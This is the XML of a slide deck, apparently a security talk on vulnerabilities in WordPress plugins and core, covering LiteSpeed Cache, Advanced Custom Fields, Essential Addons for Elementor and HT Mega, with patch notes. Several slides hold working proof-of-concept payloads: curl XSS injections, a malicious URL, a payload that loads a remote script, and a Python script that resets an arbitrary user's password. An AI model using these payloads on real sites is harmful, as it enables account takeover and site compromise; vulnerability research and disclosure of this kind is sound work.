            <a:off x="6127025" y="2869713"/>
            <a:ext cx="2193900" cy="2838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16" name="Google Shape;416;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648075" y="1745675"/>
            <a:ext cx="285900" cy="2127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17" name="Google Shape;417;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6206800" y="1324250"/>
            <a:ext cx="285900" cy="2127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18" name="Google Shape;418;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="907675" y="3970975"/>
            <a:ext cx="1455300" cy="1239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6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6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CVE-2023-40000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Site-Wide Unauth Stored XSS in LiteSpeed Cache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425" name="Google Shape;425;p36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426" name="Google Shape;426;p36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36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36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36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36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36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432" name="Google Shape;432;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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433" name="Google Shape;433;p3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47925" y="302575"/>
            <a:ext cx="772050" cy="7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3226" y="1618925"/>
            <a:ext cx="5051551" cy="34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370500" y="1231525"/>
            <a:ext cx="3349474" cy="38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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2147650" y="1121575"/>
            <a:ext cx="10719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Patch?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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7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7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CVE-2023-40000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Site-Wide Unauth Stored XSS in LiteSpeed Cache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443" name="Google Shape;443;p37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444" name="Google Shape;444;p37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37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37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37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37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37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450" name="Google Shape;450;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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451" name="Google Shape;451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47925" y="302575"/>
            <a:ext cx="772050" cy="7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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5667800" y="4143675"/>
            <a:ext cx="314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Known to be exploited:</a:t>
            </a:r>
            <a:endParaRPr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00"/>
                </a:solidFill>
                <a:latin typeface="Darker Grotesque"/>
                <a:ea typeface="Darker Grotesque"/>
                <a:cs typeface="Darker Grotesque"/>
                <a:sym typeface="Darker Grotesque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https://thehackernews.com/2024/05/hackers-exploiting-litespeed-cache-bug.html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF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</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF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53" name="Google Shape;453;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="733475" y="1923175"/>
            <a:ext cx="4196100" cy="97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$ curl -d '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent6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result[nameservers]=&lt;h1&gt;PWNED&lt;/h1&gt;&lt;svg/onload=alert(document.domain)&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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&amp;success=1' http://localhost/wp-json/litespeed/v1/cdn_status</a:t>
            </a:r>
            <a:endParaRPr b="1"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54" name="Google Shape;454;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6499688" y="1442875"/>
            <a:ext cx="1479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PoC Demo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55" name="Google Shape;455;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753575" y="3170775"/>
            <a:ext cx="4155900" cy="97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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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curl -d '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent6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result[_msg]=&lt;h1&gt;PWNED&lt;/h1&gt;&lt;svg/onload=alert(document.domain)&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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&amp;success=' http://localhost/wp-json/litespeed/v1/cdn_status</a:t>
            </a:r>
            <a:endParaRPr b="1"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456" name="Google Shape;456;p37" title="Poc_LiteSpeed_XSS.mov">
            <a:hlinkClick r:id="rId16"/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762950" y="1986006"/>
            <a:ext cx="2953400" cy="221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38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8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</a:t>
            </a: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-2023-30777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Reflected XSS in Advanced Custom Fields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464" name="Google Shape;464;p38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38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38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38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38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38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470" name="Google Shape;470;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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471" name="Google Shape;471;p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29875" y="224275"/>
            <a:ext cx="890100" cy="89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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659250" y="1536300"/>
            <a:ext cx="78255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Vulnerability Details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Introduced: v6.1.0 (03/04/2023)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Patched: v6.1.6 (04/05/2023)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Vulnerable code age: 1mo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Active installation: 2+ million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WP Core vulnerable: &lt; 6.3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Background Story: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Initially, looking for XSS on the custom fields implementation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39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9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CVE-2023-30777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Reflected XSS in Advanced Custom Fields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479" name="Google Shape;479;p39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480" name="Google Shape;480;p39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39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39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39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39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39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486" name="Google Shape;486;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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487" name="Google Shape;487;p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29875" y="224275"/>
            <a:ext cx="890100" cy="8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54725" y="1268725"/>
            <a:ext cx="4374784" cy="13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813650" y="2607125"/>
            <a:ext cx="4165002" cy="6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54725" y="3458550"/>
            <a:ext cx="4767575" cy="15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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491500" y="2096975"/>
            <a:ext cx="4297200" cy="313200"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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92" name="Google Shape;492;p39"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="491" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491500" y="2253575"/>
            <a:ext cx="379800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd fmla="val -82715" name="adj1"/>
              <a:gd fmla="val 96819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93" name="Google Shape;493;p39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3093350" y="3293025"/>
            <a:ext cx="4233900" cy="499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94" name="Google Shape;494;p3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269153" y="3901857"/>
            <a:ext cx="3757225" cy="11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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5686800" y="3566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wordpress/wp-admin/admin-header.php</a:t>
            </a:r>
            <a:endParaRPr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96" name="Google Shape;496;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7158125" y="4399250"/>
            <a:ext cx="1840500" cy="313200"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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97" name="Google Shape;497;p39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="1586825" y="4193250"/>
            <a:ext cx="3676200" cy="612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40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3" name="Google Shape;503;p40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CVE-2023-30777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Reflected XSS in Advanced Custom Fields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504" name="Google Shape;504;p40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505" name="Google Shape;505;p40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40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40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40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40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" name="Google Shape;510;p40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pic>
        <p:nvPicPr>
          <p:cNvPr id="511" name="Google Shape;511;p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29875" y="224275"/>
            <a:ext cx="890100" cy="89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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6864625" y="1478025"/>
            <a:ext cx="19002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Plugin </a:t>
            </a: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Patch?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513" name="Google Shape;513;p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74025" y="3732625"/>
            <a:ext cx="5890801" cy="1317375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4" name="Google Shape;514;p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57201" y="1268724"/>
            <a:ext cx="6290048" cy="254305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5" name="Google Shape;515;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477250" y="3526825"/>
            <a:ext cx="3630600" cy="169200"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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16" name="Google Shape;516;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165725" y="4189400"/>
            <a:ext cx="27630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WordPress Core 6.3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Patch?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1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1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CVE-2023-30777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Reflected XSS in Advanced Custom Fields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523" name="Google Shape;523;p41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524" name="Google Shape;524;p41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41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41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41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41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41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530" name="Google Shape;530;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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531" name="Google Shape;531;p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29875" y="224275"/>
            <a:ext cx="890100" cy="89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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3912163" y="1442875"/>
            <a:ext cx="1479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PoC Demo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533" name="Google Shape;533;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269250" y="4518800"/>
            <a:ext cx="86055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http://URL/wp-admin/edit.php?post_type=acf-field-group&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="accent6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post_status=1337" onload=alert(document.domain) x="</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="accent6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534" name="Google Shape;534;p41" title="Poc_ACF_XSS.mov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39946" y="1923175"/>
            <a:ext cx="3224366" cy="24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42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2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</a:t>
            </a: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2024-31111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WordPress Core Authenticated XSS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541" name="Google Shape;541;p42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542" name="Google Shape;542;p42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42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42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2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42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7" name="Google Shape;547;p42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548" name="Google Shape;548;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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549" name="Google Shape;549;p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42600" y="156500"/>
            <a:ext cx="923326" cy="923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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659250" y="1536300"/>
            <a:ext cx="78255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Vulnerability Details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Introduced: v5.9 (25/01/2022)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Patched: v6.5.5 (24/06/2024)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Vulnerable code age: 2yr5mo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Active installation: Many :)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Background Story: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Initially, searching for any vulns on the registered Gutenberg block process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667750" y="2183850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Intro</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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89" name="Google Shape;89;p16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6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6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6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6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6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43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3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</a:t>
            </a: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2024-31111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WordPress Core Authenticated XSS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557" name="Google Shape;557;p43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558" name="Google Shape;558;p43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43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43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43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43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" name="Google Shape;563;p43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564" name="Google Shape;564;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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565" name="Google Shape;565;p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42600" y="156500"/>
            <a:ext cx="923326" cy="92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0825" y="1554425"/>
            <a:ext cx="4943165" cy="3321176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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605150" y="3844475"/>
            <a:ext cx="2737500" cy="297300"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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68" name="Google Shape;568;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="881600" y="4394425"/>
            <a:ext cx="672900" cy="216900"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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69" name="Google Shape;569;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314100" y="4546825"/>
            <a:ext cx="744900" cy="216900"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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570" name="Google Shape;570;p43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="567" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="474650" y="3993125"/>
            <a:ext cx="130500" cy="3261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571" name="Google Shape;571;p4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339801" y="2700725"/>
            <a:ext cx="3615949" cy="19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44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4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</a:t>
            </a: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2024-31111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WordPress Core Authenticated XSS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578" name="Google Shape;578;p44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579" name="Google Shape;579;p44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44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44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44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44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p44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585" name="Google Shape;585;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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586" name="Google Shape;586;p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42600" y="156500"/>
            <a:ext cx="923326" cy="923326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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3857400" y="1268725"/>
            <a:ext cx="1429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The Patch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588" name="Google Shape;588;p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06329" y="1896024"/>
            <a:ext cx="7891596" cy="30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45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5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</a:t>
            </a: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2024-31111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WordPress Core Authenticated XSS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595" name="Google Shape;595;p45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596" name="Google Shape;596;p45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45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45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45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45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1" name="Google Shape;601;p45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602" name="Google Shape;602;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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603" name="Google Shape;603;p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42600" y="156500"/>
            <a:ext cx="923326" cy="92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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3230250" y="1401013"/>
            <a:ext cx="2683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PoC Demo on v6.3.2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05" name="Google Shape;605;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903450" y="4488950"/>
            <a:ext cx="7337100" cy="38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&lt;!-- wp:template-part {\"tagName\":\"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent6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script src=http://JS_FILE_ON_ANY_SERVER </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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\"} /--&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"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606" name="Google Shape;606;p45" title="PoC_Core_XSS.mov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150950" y="2013600"/>
            <a:ext cx="3002375" cy="22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46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46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737700" y="2127450"/>
            <a:ext cx="76686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Overlooked PrivEsc</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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Case Studies</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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613" name="Google Shape;613;p46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614" name="Google Shape;614;p46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46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46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46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46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9" name="Google Shape;619;p46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47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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238775" y="271225"/>
            <a:ext cx="8814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</a:t>
            </a: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2023-32243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Unauth ATO in Essential Addons for Elementor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626" name="Google Shape;626;p47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627" name="Google Shape;627;p47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47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47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" name="Google Shape;630;p47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p47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47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633" name="Google Shape;633;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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634" name="Google Shape;634;p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42825" y="271225"/>
            <a:ext cx="843975" cy="8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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425"/>
            <a:ext cx="78255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Vulnerability Details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Introduced: v5.4.0 (26/10/2022)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Patched: v5.7.0.1 (11/05/2023)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Vulnerable code age: 7mo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Active installation: 2+ million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Background Story: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Initially, searching for vulns on the custom registration process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48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48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238775" y="271225"/>
            <a:ext cx="8814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CVE-2023-32243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Unauth ATO in Essential Addons for Elementor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642" name="Google Shape;642;p48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643" name="Google Shape;643;p48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48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48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48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48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p48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649" name="Google Shape;649;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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650" name="Google Shape;650;p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42825" y="271225"/>
            <a:ext cx="843975" cy="8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854703" y="1400001"/>
            <a:ext cx="3770470" cy="7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38773" y="2195225"/>
            <a:ext cx="4154301" cy="207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501204" y="2920088"/>
            <a:ext cx="4477471" cy="1932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4" name="Google Shape;654;p48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="651" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4458288" y="222251"/>
            <a:ext cx="395100" cy="41682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55" name="Google Shape;655;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="1930125" y="3276050"/>
            <a:ext cx="2577000" cy="526800"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 72671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56" name="Google Shape;656;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4862950" y="3964450"/>
            <a:ext cx="546600" cy="172200"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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57" name="Google Shape;657;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4862950" y="4157525"/>
            <a:ext cx="2226300" cy="266100"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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658" name="Google Shape;658;p48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="657" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6193150" y="4290575"/>
            <a:ext cx="896100" cy="290700"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val -26573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59" name="Google Shape;659;p48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="656" idx="2"/>
            <a:endCxn id="657" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4862950" y="4050550"/>
            <a:ext cx="600" cy="240000"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val -396875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49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49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238775" y="271225"/>
            <a:ext cx="8814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CVE-2023-32243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Unauth </a:t>
            </a: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ATO</a:t>
            </a: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in Essential Addons for Elementor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666" name="Google Shape;666;p49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667" name="Google Shape;667;p49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49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49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49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49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" name="Google Shape;672;p49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pic>
        <p:nvPicPr>
          <p:cNvPr id="673" name="Google Shape;673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42825" y="271225"/>
            <a:ext cx="843975" cy="8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49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="28350" y="1292500"/>
            <a:ext cx="10719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Patch?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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675" name="Google Shape;6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00238" y="1292500"/>
            <a:ext cx="6943524" cy="366840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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2073150" y="4324500"/>
            <a:ext cx="4228500" cy="323400"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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50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50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238775" y="271225"/>
            <a:ext cx="8814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CVE-2023-32243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Unauth </a:t>
            </a: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ATO</a:t>
            </a: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in Essential Addons for Elementor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683" name="Google Shape;683;p50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684" name="Google Shape;684;p50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p50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50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50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50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9" name="Google Shape;689;p50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690" name="Google Shape;690;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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691" name="Google Shape;691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42825" y="271225"/>
            <a:ext cx="843975" cy="8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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5834950" y="4050150"/>
            <a:ext cx="294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Known to be exploited:</a:t>
            </a:r>
            <a:endParaRPr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00"/>
                </a:solidFill>
                <a:latin typeface="Darker Grotesque"/>
                <a:ea typeface="Darker Grotesque"/>
                <a:cs typeface="Darker Grotesque"/>
                <a:sym typeface="Darker Grotesque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https://blog.sucuri.net/2023/05/vulnerability-in-essential-addons-for-elementor-leads-to-mass-infection.html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF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</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF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93" name="Google Shape;693;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6499688" y="1442875"/>
            <a:ext cx="1479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PoC Demo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94" name="Google Shape;694;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584275" y="1292850"/>
            <a:ext cx="4962300" cy="370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import re, requests, sys</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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6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BASE_URL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1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= sys.argv[1]</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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6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TARGET_USERNAME </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1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= sys.argv[2]</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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6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NEW_PASSWORD </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1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= sys.argv[3]</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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res = requests.get(BASE_URL).text</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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login_nonce = re.findall(r'"nonce":"(.*?)"', res)[0]</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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print(f"[+] Login Nonce: {login_nonce}")</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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form = {</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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   "eael-resetpassword-submit":"1",</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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   "page_id":"xxx",</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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   "widget_id":"xxx",</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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   "eael-resetpassword-nonce":login_nonce,</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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   "eael-pass1":NEW_PASSWORD,</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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   "eael-pass2":NEW_PASSWORD,</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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   "rp_login":TARGET_USERNAME</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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}</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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res2 = requests.post(BASE_URL + "/wp-admin/admin-ajax.php",data=form)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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print(f"[+] ATO Success")</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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695" name="Google Shape;695;p50" title="PoC_EssentialAddonsElementor_ATO.mov">
            <a:hlinkClick r:id="rId16"/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759313" y="1923175"/>
            <a:ext cx="2960675" cy="22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51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51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CVE-2023-37999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Unauth PrivEsc in HT Mega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702" name="Google Shape;702;p51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703" name="Google Shape;703;p51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51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51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51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51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8" name="Google Shape;708;p51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709" name="Google Shape;709;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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10" name="Google Shape;710;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425"/>
            <a:ext cx="78255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Vulnerability Details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Introduced: v2.1.0 (06/03/2023)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Patched: v2.2.1 (05/07/2023)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Vulnerable code age: 4mo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Active installation: 100k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Background Story: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Initially, searching for vulns on the custom registration process and turns out it is vulnerable :)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711" name="Google Shape;711;p5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73600" y="130550"/>
            <a:ext cx="1216250" cy="12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52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52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</a:t>
            </a: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2023-37999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Unauth PrivEsc in HT Mega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718" name="Google Shape;718;p52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719" name="Google Shape;719;p52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52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52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52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52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4" name="Google Shape;724;p52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725" name="Google Shape;725;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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726" name="Google Shape;726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73600" y="130550"/>
            <a:ext cx="1216250" cy="12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06775" y="1498100"/>
            <a:ext cx="4890051" cy="3285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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5316875" y="3980225"/>
            <a:ext cx="36618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htmega_validation_data</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1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function only checks the string validity of username, email, password and user URL.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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29" name="Google Shape;729;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276500" y="2983850"/>
            <a:ext cx="4861800" cy="448500"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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30" name="Google Shape;730;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584275" y="4439125"/>
            <a:ext cx="2770200" cy="237000"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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731" name="Google Shape;731;p52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="729" idx="2"/>
            <a:endCxn id="730" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276500" y="3208100"/>
            <a:ext cx="307800" cy="1349400"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val -77364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32" name="Google Shape;732;p52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2122975" y="1804825"/>
            <a:ext cx="3297000" cy="787800"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 6962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733" name="Google Shape;733;p5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275425" y="2571750"/>
            <a:ext cx="3703250" cy="5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584275" y="271225"/>
            <a:ext cx="7668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Why target CMS ?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101" name="Google Shape;101;p17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102" name="Google Shape;102;p17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7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7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7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7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7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108" name="Google Shape;108;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710600" y="1504650"/>
            <a:ext cx="76686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CMS platform is still a first go-to solution for managing a content on a website without the need for technical knowledge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 2022, over 67% of websites utilized a CMS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Most of the times, it has a lot of features to check for vulns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53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3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CVE-2023-37999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Unauth PrivEsc in HT Mega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740" name="Google Shape;740;p53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741" name="Google Shape;741;p53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53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53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p53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p53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6" name="Google Shape;746;p53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pic>
        <p:nvPicPr>
          <p:cNvPr id="747" name="Google Shape;747;p5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73600" y="130550"/>
            <a:ext cx="1216250" cy="12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53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4116175" y="1167775"/>
            <a:ext cx="1071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Patch?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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749" name="Google Shape;749;p5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37325" y="1677133"/>
            <a:ext cx="8229601" cy="3347279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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1666425" y="3252400"/>
            <a:ext cx="7053600" cy="274800"/>
          </a:xfrm>
